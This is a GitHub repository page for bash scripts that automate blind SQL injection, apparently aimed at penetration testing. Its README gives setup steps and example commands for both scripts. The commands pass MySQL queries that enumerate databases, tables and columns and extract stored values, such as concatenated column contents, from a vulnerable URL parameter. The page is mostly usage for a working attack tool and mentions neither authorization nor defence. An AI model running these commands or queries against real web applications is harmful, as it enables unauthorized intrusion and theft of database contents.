Skip to content

These are bash scripts made for automating the exploitation of Blind SQL Injection Vulnerabilities

License

Notifications You must be signed in to change notification settings

sergiovks/Scripts-for-exploiting-Blind-SQL-injection

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

20 Commits
 
 
 
 
 
 
 
 

Repository files navigation

Script-for-exploiting-Blind-SQL-injection

This is a bash script made for automating the exploitation of Blind SQL Injection Vulnerabilities

HIGLY RECOMMENDED TO MAKE THE QUERY "@@version" TO SEE WHICH IS THE DATABASE VERSION TO SEND THE APPROPIATE QUERYS

FOR blindSQLi.sh:

CHANGE THE URL ON THE 5th line for the one that you want to use

CHANGE THE ?band=the offspring' of the 20th line for "? the vulnerable parameter=Xvalue' "

CHANGE THE truestring variable for the string you obtain when a normal query is well done.

Examples of use with MySQL queries:

bash blindSQLi.sh 20 "Select user()"
bash blindSQLi.sh 20 "Select database()" #show the actual database

bash blindSQLi.sh 20 "SELECT table_name FROM information_schema.tables WHERE table_schema='DATABASEname' limit 0,1 " #show 1st table name of a database
bash blindSQLi.sh 20 "SELECT table_name FROM information_schema.tables WHERE table_schema='DATABASEname' limit 1,1 " #show 2nd table name of a database, and so on...

bash blindSQLi.sh 20 "SELECT column_name FROM information_schema.columns WHERE table_name='TABLEname' limit 0,1 " #show the 1st column name of a table.
bash blindSQLi.sh 20 "SELECT column_name FROM information_schema.columns WHERE table_name='TABLEname' limit 1,1 " #show the 2nd column name of a table and so on...

bash blindSQLi.sh 30 "SELECT concat(COLUMN1, '---', COLUMN2) FROM TABLEname limit 0,1 " #extract the 1st value of 2 columns from a table.
bash blindSQLi.sh 30 "SELECT concat(COLUMN1, '---', COLUMN2, '---', COLUMN3) FROM TABLEname limit 1,1 " #extract the 2nd value of 3 columns from a table and so on...

Where 20 is maximum of characters we expect from the response and what's inside the quotes is the query that you want to do.

You can use a query cheatsheet like the ones that are in the PentestMonkey webpage.

FOR blind.sh

-u, --url              The URL to query, f. ex: http://webpage.com/banddetails.php"
-i, --id               The ID parameter to use in the URL, f. ex: ?band=20"
-t, --truestring       The response that the web application shows when a request is successful, f. ex: We worked with them in the past"
-m, --maxlength        The maximum length of the substring to extract, f. ex: 20"
-q, --query            The SQL query to extract the substring from, see PentestMonkey SQL injection cheatsheets"
-h, --help             Show this help panel"

EXAMPLE OF USE FOR blind.sh

./blind.sh -u http://webpage.com/banddetails.php -i "?band=20" -t "We worked with them in the past" -m 30 -q "Select user()"

About

These are bash scripts made for automating the exploitation of Blind SQL Injection Vulnerabilities

Topics

Resources

License

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages